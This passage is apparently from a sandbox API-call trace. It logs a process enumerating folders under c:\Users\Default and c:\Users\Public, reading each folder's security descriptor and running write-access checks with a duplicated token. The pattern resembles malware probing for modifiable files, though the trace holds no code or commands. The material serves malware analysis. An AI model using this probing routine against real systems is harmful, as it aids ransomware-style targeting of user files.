RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281baf8) returned 1 [0106.382] GetLastError () returned 0x7a [0106.382] GetCurrentThread () returned 0xfffffffe [0106.382] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.382] GetCurrentProcess () returned 0xffffffff [0106.382] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.382] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.382] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.382] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.382] CloseHandle (hObject=0x344) returned 1 [0106.382] CloseHandle (hObject=0x33c) returned 1 [0106.382] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.382] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.382] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.382] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.382] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.382] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.382] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.382] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.383] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Saved Games", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.383] GetLastError () returned 0x7a [0106.383] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Saved Games", RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281baf8) returned 1 [0106.383] GetLastError () returned 0x7a [0106.383] GetCurrentThread () returned 0xfffffffe [0106.383] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.383] GetCurrentProcess () returned 0xffffffff [0106.383] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.383] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.383] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.383] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.383] CloseHandle (hObject=0x344) returned 1 [0106.383] CloseHandle (hObject=0x33c) returned 1 [0106.383] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.383] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.383] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.383] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.383] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.383] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Searches\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.385] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Searches", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.385] GetLastError () returned 0x7a [0106.385] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Searches", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.385] GetLastError () returned 0x7a [0106.385] GetCurrentThread () returned 0xfffffffe [0106.385] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.385] GetCurrentProcess () returned 0xffffffff [0106.385] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.385] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.385] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.385] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.385] CloseHandle (hObject=0x344) returned 1 [0106.385] CloseHandle (hObject=0x33c) returned 1 [0106.385] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.385] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.385] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.385] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.385] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.385] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.386] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.386] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.386] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.386] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.386] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Videos\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.386] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Videos", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.386] GetLastError () returned 0x7a [0106.386] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Videos", RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281baf8) returned 1 [0106.386] GetLastError () returned 0x7a [0106.386] GetCurrentThread () returned 0xfffffffe [0106.386] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.386] GetCurrentProcess () returned 0xffffffff [0106.386] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.386] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.386] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.386] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.386] CloseHandle (hObject=0x344) returned 1 [0106.386] CloseHandle (hObject=0x33c) returned 1 [0106.386] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.386] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.386] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.386] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.387] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.387] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.387] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.387] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.387] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.387] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0106.387] GetFileSecurityW (in: lpFileName="c:\\Users\\Public", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0106.387] GetLastError () returned 0x7a [0106.387] GetFileSecurityW (in: lpFileName="c:\\Users\\Public", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xf4, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281c090) returned 1 [0106.387] GetLastError () returned 0x7a [0106.387] GetCurrentThread () returned 0xfffffffe [0106.387] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0106.387] GetCurrentProcess () returned 0xffffffff [0106.387] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0106.387] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x33c) returned 1 [0106.387] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0106.387] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0106.387] CloseHandle (hObject=0x33c) returned 1 [0106.387] CloseHandle (hObject=0x334) returned 1 [0106.387] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.387] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.387] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Desktop\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.387] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Desktop", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.387] GetLastError () returned 0x7a [0106.388] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Desktop", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xa0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.388] GetLastError () returned 0x7a [0106.388] GetCurrentThread () returned 0xfffffffe [0106.388] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.388] GetCurrentProcess () returned 0xffffffff [0106.388] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.388] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.388] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.388] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.388] CloseHandle (hObject=0x344) returned 1 [0106.388] CloseHandle (hObject=0x33c) returned 1 [0106.388] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.388] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.388] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.388] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.388] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.388] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.388] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.388] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.388] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.388] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Documents\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.388] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Documents", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.388] GetLastError () returned 0x7a [0106.388] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Documents", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.389] GetLastError () returned 0x7a [0106.389] GetCurrentThread () returned 0xfffffffe [0106.389] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.389] GetCurrentProcess () returned 0xffffffff [0106.389] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.389] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.389] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.389] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.389] CloseHandle (hObject=0x344) returned 1 [0106.389] CloseHandle (hObject=0x33c) returned 1 [0106.389] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.389] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.389] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.389] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.389] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.389] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.389] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.389] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.389] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Downloads\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.389] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Downloads", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.389] GetLastError () returned 0x7a [0106.389] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Downloads", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.389] GetLastError () returned 0x7a [0106.389] GetCurrentThread () returned 0xfffffffe [0106.389] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.389] GetCurrentProcess () returned 0xffffffff [0106.389] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.389] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.390] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.390] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.390] CloseHandle (hObject=0x344) returned 1 [0106.390] CloseHandle (hObject=0x33c) returned 1 [0106.390] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.390] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.390] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.390] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.390] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.390] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Favorites\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.390] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Favorites", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.390] GetLastError () returned 0x7a [0106.390] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Favorites", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.390] GetLastError () returned 0x7a [0106.390] GetCurrentThread () returned 0xfffffffe [0106.390] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.390] GetCurrentProcess () returned 0xffffffff [0106.390] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.390] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.390] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.390] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.390] CloseHandle (hObject=0x344) returned 1 [0106.390] CloseHandle (hObject=0x33c) returned 1 [0106.390] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.391] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.391] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Libraries\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.391] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Libraries", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.391] GetLastError () returned 0x7a [0106.391] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Libraries", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.391] GetLastError () returned 0x7a [0106.391] GetCurrentThread () returned 0xfffffffe [0106.391] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.391] GetCurrentProcess () returned 0xffffffff [0106.391] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.391] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.391] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.391] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.391] CloseHandle (hObject=0x344) returned 1 [0106.391] CloseHandle (hObject=0x33c) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.391] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.391] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Music\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.392] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Music", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.392] GetLastError () returned 0x7a [0106.392] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Music", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.392] GetLastError () returned 0x7a [0106.392] GetCurrentThread () returned 0xfffffffe [0106.392] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 